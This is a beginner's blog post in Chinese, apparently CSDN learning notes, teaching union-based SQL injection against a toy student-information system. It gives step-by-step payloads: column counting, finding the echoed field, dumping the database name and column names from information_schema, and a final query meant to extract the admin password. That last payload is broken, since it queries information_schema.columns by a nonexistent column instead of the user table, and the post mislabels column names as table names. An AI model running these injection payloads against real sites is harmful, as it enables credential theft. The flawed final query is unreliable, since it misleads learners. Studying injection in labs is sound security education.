SQL注入初学(1)

最新推荐文章于 2024-07-20 17:22:43 发布
最新推荐文章于 2024-07-20 17:22:43 发布
阅读量790 收藏
点赞数 1
文章标签: sql mysql php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64417923/article/details/124499873
版权

,DAY1:

在知识星球上看到了师兄的《从0开始学习sql注入》,最近开头蛮有意思的,而且最近学了一点点PHP、MySQL,于是感兴趣的试图开始学习一点sql注入。

那就从最简单的网页开始吧

首先是小黄同学搭建了一个简单的数据管理系统,其中有一个查询功能点可以查询学生的用户名

(搭网站看起来也挺有意思下次试试=)

如果在MySQL数据库users中的表userinfo中存有三列:学号id,用户名uname,密码password;表建立完成后添加了五个用户信息,其中包含了管理员账号admin和密码。

如果在用户输入时没有进行过滤或转义,直接把用户输入拼接到了后端的sql语句中,就可以进行SQL注入。

一、需要用到几个sql语句:

1:union select

用来查询多个字段;

union select <列1,列2,......> from <table_name> where <condition>;

2:order by

用于查询结果的排序;

用法是当order by 的列数大于实际列数,那么就会报错,可以用来判断表中有几列。

3:group_concat

用于把多个查询结果进行连接,可以把查询出的字段连接显示。

二、在数据库information_schema,储存着两个重要的表,

information_schema.tables(储存着所有表名)

information_schema.columns(储存着所有列名)

在information_schema.tables中一列table_schema(储存着来自哪个数据库)可以知道来源数据库的名字

三、开始查询。

如果输入

1 union select 1,2,3 #

因为只有一个回显位,所以先显示了id1的查询结果

所以需要控制回显字段

-1 union select 1,2,3 #

发现2被回显,说明回显字段在第二列

接下来输入

-1 union select 1,database(),3 #

 返回:users

此时可以得到数据库名称:users

输入payload去爆表名

 

-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name="userinfo"#

得到表名id.passwd.uname

-1 union select 1,passwd,3 from information_schema.columns where name="admin" #

 于是就可以得出admin的密码啦

理论学习到此,下一步可能是找点题实践啦=)

m0_64417923
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入学习第一篇---基础
qq_36874480的博客
07-03 247
SQL注入原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合, 通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致; 后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法的数据查询。 基于此,SQL注入的产生原因通常表现在以下几方面: ①不当的类型处理; ②不安全的数据库配
web安全之SQL注入--第一章 课程介绍
weixin_34378969的博客
08-21 91
课程介绍1.什么是SQL注入?2.如何寻找SQL注入漏洞?3.如何进行sql注入攻击?4.如何预防sql注入5.课程总结 转载于:https://www.cnblogs.com/Worssmagee1002/p/7404508.html
学生信息管理系统--SQL注入
令仔很忙
08-18 3615
当你在登陆学生管理系统的时候,添加的用户名若和你数据库中的数据不符时,就会弹出一个窗体,告诉你没有这个用户;但是当你在用户名中输入数字或者字母外加英文状态下的单引号,比如:“a'”
数据库SQL
T283wanqiangyu的博客
05-03 1830
1、系统自带的四个数据库 系统数据库:master 模型数据库:model 临时数据库:tempdb 警报数据库:msdb 2、 查询:select 新建:create 删除:drop 数据库:database 基本数据类型: int——整数 float——小数 varchar(长度)——字符串 char(长度) 3、创建表格式 create table 表名( 字段名 数据...
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 4817
以pikachu靶场练习来学习ctf知识
小白初学sql注入
Butterfly_Erhai_Lake的博客
10-26 486
sql-lab lesson1&2&3
SQL注入 初学笔记
qq_37019068的博客
08-27 177
SQL注入成因 开发者在开发过程中,直接将URL的参数、HTTP体中的post参数或(Cookies, UserAgent)等与SQL语句进行了拼接,造成了hack对于待执行的sql语句的可控。 常见SQL注入 1.联合查询注入 (适用于有回显的get请求) /* $id = $_GET['id']; $getid = "select id from users where user_id = '$id'"; #php默认双引号内内容可解释,单引号不可 $result=...
sql注入初学——松风1
08-03
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能正确过滤或验证用户输入的情况下,允许攻击者向SQL查询中插入恶意代码。本文将深入探讨SQL注入的基本概念、检测方法以及针对不同数据库类型的识别技术。 ...
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
sql注入靶场.zip
06-24
靶场的核心是sqli-labs,这是一个开源的SQL注入练习平台,特别适合初学者和专业人士用来增强对SQL注入的理解。它模拟了各种类型的SQL注入漏洞,包括但不限于错误基线注入、时间基线注入、盲注、联合查询注入、堆叠...
sql注入神器.zip
07-01
1. **自动扫描**:工具可能具备自动扫描网站或应用的功能,检测潜在的SQL注入点,分析输入参数并构造相应的SQL查询以测试漏洞。 2. **漏洞利用**:对于检测到的漏洞,工具可能会尝试模拟实际攻击,以验证其可行性,...
SQL注入攻击初学文档
12-24
通过学习SQL注入后的经验分享 这是ppt 还有另外一份对网站进行sql注入得到账号密码的操作手册 在我上传的资源里
多租户架构的艺术:在SQL Server中实现数据库的多租户
最新发布
2401_85762266的博客
07-20 484
多租户架构允许多个租户共享相同的应用程序和数据库架构,每个租户的数据被逻辑上隔离。这种架构的优势在于成本效益和可扩展性,但同时也带来了数据隔离、性能和安全性的挑战。
PostgreSQL异常:An I/O error occurred while sending to the backend
IT后浪的博客
07-19 403
在使用PostgreSQL数据库批量写入数据的时候,遇到了一个问题,异常内容如下:Cause: org.postgresql.util.PSQLException: An I/O error occurred while sending to the backend.
接口开发:Orcal数据库的批量新增sql
qq_65032048的博客
07-17 827
场景:在日常的CURD中一定会用到批量新增。在我们的项目中,使用的数据库是Orcal,由于之前基本都是使用Mysql的,使用的sql语句也基本都是用mysql的。但是在这次的接口编写时用mysql的批量新增出了问题,刚开始我还以为是写的动态sql有问题,在后续的问题修改也主要是对动态sql修改,因此也浪费了大量的时间,在后续把sql搬到数据库运行一下后才发现是sql的问题,同时也了解到了mysql和orcal 也是有很多地方是不同的。
PostgreSQL的逻辑架构
weixin_41992498的博客
07-18 147
一、PostgreSql的逻辑架构:所有者:
MySQL】根据binlog日志获取回滚sql的一个开发思路
weixin_45385457的博客
07-19 464
不同客户端之间会交替追加在 binlog 中,需要通过 👆的 binlog 匹配流程来控制匹配。行,需要再次寻找 thread_id 相同的行,匹配到后执行上一个流程。在 binlog 中的线程 ID 记录为 thread_id。一个线程执行多个 sql 回滚到同一个文件可能带来的问题。对应 binlog 日志中的 thread_id=指定 mysql 客户端 开始时间和结束时间。打开 mysql 客户端 开始时间。关闭 mysql 客户端 结束时间。先匹配 thread_id 相同的。
【数据库技术NoSQL】MongoDB和Cassandra的使用
weixin_39372311的博客
07-20 1073
非关系型:不使用传统的表结构,而是采用键值对、文档、列族或图等存储方式。可扩展性:支持横向扩展,能够通过增加节点来提升性能和容量。灵活的模式:不需要预定义数据模式,数据结构可以灵活变化。高性能:在处理大规模数据和高并发访问时,表现出色。灵活的文档模型:采用BSON(二进制JSON)格式存储数据,支持复杂的数据结构。高可用性和可扩展性:支持副本集和分片技术,保证数据的高可用性和可扩展性。强大的查询能力:支持丰富的查询语言和索引机制。高可用性和无单点故障:采用对等架构,所有节点均可提供读写服务。
SQL注入漏洞详解与防范
"SQL注入漏洞全接触" SQL注入是一种常见的网络安全问题,主要发生在基于Web的应用程序中,当应用程序没有正确地过滤或验证用户输入的数据时,攻击者可以通过输入恶意的SQL代码来操纵数据库。这种漏洞允许攻击者绕过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值